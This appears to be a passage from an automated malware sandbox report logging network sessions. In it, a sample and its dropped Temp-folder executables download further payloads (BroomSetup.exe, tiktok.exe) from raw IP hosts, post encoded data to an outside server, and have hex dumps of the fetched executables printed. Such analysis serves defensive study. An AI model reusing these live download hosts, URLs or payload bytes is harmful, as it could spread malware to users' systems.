                                                                                                                                                      Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
                                                                                                                                                      Apr 27, 2024 02:19:03.007222891 CEST1289INData Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c
                                                                                                                                                      Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H|Im8z*n2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;*,.|j\[S
                                                                                                                                                      Apr 27, 2024 02:19:03.007268906 CEST1289INData Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5
                                                                                                                                                      Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
                                                                                                                                                      Apr 27, 2024 02:19:03.007296085 CEST1289INData Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a
                                                                                                                                                      Data Ascii: ><*:X4.`="+P!`p;KE.|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_|gYA#*8
                                                                                                                                                      Apr 27, 2024 02:19:03.007349968 CEST1289INData Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43
                                                                                                                                                      Data Ascii: 94SI6j<TNmokj>*_P7!Wv}!K2@3Cs*-<HIo5 Q0V?4v^i2D5v$ip^`RLK$*.0 ^wS~W _h*:JIEE;/?j8-
                                                                                                                                                      Apr 27, 2024 02:19:03.007368088 CEST1289INData Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8
                                                                                                                                                      Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
                                                                                                                                                      Apr 27, 2024 02:19:03.007584095 CEST1289INData Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d
                                                                                                                                                      Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
                                                                                                                                                      Apr 27, 2024 02:19:03.007668972 CEST1289INData Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb
                                                                                                                                                      Data Ascii: 2h\T^BTZP{@%{J.B|n$=6icc6%Zxn1#]|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
                                                                                                                                                      Apr 27, 2024 02:19:03.007703066 CEST1289INData Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25
                                                                                                                                                      Data Ascii: p_%cBeg3-Ul #B|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
                                                                                                                                                      Apr 27, 2024 02:19:03.204054117 CEST1289INData Raw: fc b7 8a 91 81 fd bd 3e b8 27 f4 5e e3 be 4e b9 09 07 0b 83 76 51 ce 7b f3 45 d3 ea b5 e6 16 21 d2 a4 f9 f9 77 96 84 d3 f5 bb 5a b2 0f c6 ef bc 9e 3e 49 7d 9f ec 5f f4 28 7f 86 7b 4e 93 76 35 c1 86 30 75 66 d6 58 5c 92 6f af 89 ed 9e 29 3b 3b d4
                                                                                                                                                      Data Ascii: >'^NvQ{E!wZ>I}_({Nv50ufX\o);;Ed_* :-aG7Y:%5hf35lvN>>}oJw!/[Ax*u}B|^t!Zj^FKG>vokAk/1IiuA


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      5192.168.2.449740185.172.128.228804312C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:19:53.664659023 CEST185OUTGET /BroomSetup.exe HTTP/1.1
                                                                                                                                                      Host: 185.172.128.228
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                      Apr 27, 2024 02:19:53.837498903 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:53 GMT
                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                      Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                      ETag: "4a4030-613b1bf118700"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 4866096
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08|7@B.rsrc<<@@JJ@@ [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:53.837605000 CEST1289INData Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff
                                                                                                                                                      Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
                                                                                                                                                      Apr 27, 2024 02:19:53.837742090 CEST1289INData Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f
                                                                                                                                                      Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
                                                                                                                                                      Apr 27, 2024 02:19:53.837848902 CEST1289INData Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72
                                                                                                                                                      Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
                                                                                                                                                      Apr 27, 2024 02:19:53.837953091 CEST1289INData Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65
                                                                                                                                                      Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
                                                                                                                                                      Apr 27, 2024 02:19:53.838057041 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                      Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                      Apr 27, 2024 02:19:53.838143110 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
                                                                                                                                                      Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                      Apr 27, 2024 02:19:53.838201046 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                      Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                      Apr 27, 2024 02:19:53.838253975 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                      Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                      Apr 27, 2024 02:19:53.838324070 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                      Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
                                                                                                                                                      Apr 27, 2024 02:19:54.008346081 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                      Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      6192.168.2.44976020.157.87.45803156C:\Users\user\AppData\Local\Temp\u3bs.3.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:20:48.463546991 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 300
                                                                                                                                                      Host: svc.iolo.com
                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                      Apr 27, 2024 02:20:48.660551071 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                      Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                      Apr 27, 2024 02:20:48.844949007 CEST469INHTTP/1.1 200 OK
                                                                                                                                                      cache-control: private
                                                                                                                                                      content-length: 256
                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                      x-whom: Ioloweb7
                                                                                                                                                      date: Sat, 27 Apr 2024 00:20:48 GMT
                                                                                                                                                      set-cookie: SERVERID=svc7; path=/
                                                                                                                                                      connection: close
                                                                                                                                                      Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                      Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      7192.168.2.449762185.172.128.203806808C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:20:51.360459089 CEST76OUTGET /tiktok.exe HTTP/1.1
                                                                                                                                                      Host: 185.172.128.203
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:51.532069921 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:51 GMT
                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                      Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT
                                                                                                                                                      ETag: "85400-616de2c892480"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 545792
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:20:51.532136917 CEST1289INData Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45
                                                                                                                                                      Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
                                                                                                                                                      Apr 27, 2024 02:20:51.532239914 CEST1289INData Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58
                                                                                                                                                      Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
                                                                                                                                                      Apr 27, 2024 02:20:51.532366037 CEST1289INData Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33
                                                                                                                                                      Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
                                                                                                                                                      Apr 27, 2024 02:20:51.532404900 CEST1289INData Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3
                                                                                                                                                      Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
                                                                                                                                                      Apr 27, 2024 02:20:51.532459021 CEST1289INData Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d
                                                                                                                                                      Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
                                                                                                                                                      Apr 27, 2024 02:20:51.532546997 CEST1289INData Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52
                                                                                                                                                      Data Ascii: APb2|$vWGD$@PjGt=|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$|$8D$$D$4CD$$GhG6'@'@#(@(@*)@*)@
                                                                                                                                                      Apr 27, 2024 02:20:51.532643080 CEST1289INData Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6
                                                                                                                                                      Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
                                                                                                                                                      Apr 27, 2024 02:20:51.532680988 CEST1289INData Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc
                                                                                                                                                      Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
                                                                                                                                                      Apr 27, 2024 02:20:51.532720089 CEST1289INData Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00
                                                                                                                                                      Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
                                                                                                                                                      Apr 27, 2024 02:20:51.703085899 CEST1289INData Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e
                                                                                                                                                      Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      8192.168.2.44976920.157.87.4580
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:21:09.521313906 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 300
                                                                                                                                                      Host: svc.iolo.com
                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                      Apr 27, 2024 02:21:10.010787964 CEST566OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 300
                                                                                                                                                      Host: svc.iolo.com
                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      User-Agent: Mozilla/3.0 (compatible; Indy Library)
